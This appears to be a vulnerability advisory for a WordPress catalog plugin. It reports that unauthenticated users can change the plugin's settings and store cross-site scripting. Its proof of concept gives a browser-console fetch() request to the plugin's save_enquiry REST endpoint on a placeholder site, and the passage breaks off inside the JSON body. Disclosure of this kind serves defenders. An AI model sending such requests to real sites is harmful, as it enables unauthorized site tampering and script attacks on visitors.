Description The plugin does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.
PoC
- Make sure the plugin is configured with the “Catalog Mode” activated. 2) Launch the following from your browser’s console: ``` fetch(“http://vulnerable-site.tld/wp-json/mvx_catalog/v1/save_enquiry”, {“headers”: {“content-type”: “application/json”,}, “body”: " {"model":{"from_loading":true,"statedrop":[],"errordisplay":"Settings Saved","complete_option_value":[],"button_type":{"value":"4","label":"No Link Just #","index":3},"is_button":["is_button"],"custom_hover_background_color":"#0}